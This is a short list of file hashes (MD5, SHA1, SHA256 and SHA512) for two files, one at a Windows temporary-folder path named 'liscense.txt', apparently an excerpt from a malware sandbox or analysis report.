MD5 851ffc982e513bf50a75b4f81edf582d
SHA1 3918d31b5136eb012c1c7edb975b0f91a9abbad6
SHA256 dfdf810615ce2e8f00b24f1ef983789022478969eea1369733692c4fc0180eb4
SHA512 fb3ef5582b7a70d85dc122d29dff2e98719f1fc42dbd913d5f3479df447034ba5b72ba74d9013e9c32da6ce50517888b3a6fe3f7ce9f02f73c96bfa2ad3d93b4

C:\Users\Admin\AppData\Local\Temp\liscense.txt

MD5 b77c85675375ed548a4c019ae9ad5eda
SHA1 f1f6559245707e38403b72c57f201784f1086f7d
SHA256 81a02546f3d9da106053d1800ba1a0c00815a8903661b5c1c086a5c88aedd1f9
SHA512 3d6cdefda811dcaaff88f54117f03bfff04a04ba03efdf45167a7c4712bab3334974b404421d5bd1e3ad7eb65b0c390ddf472f9d256bd0cd8786e87ab8571bef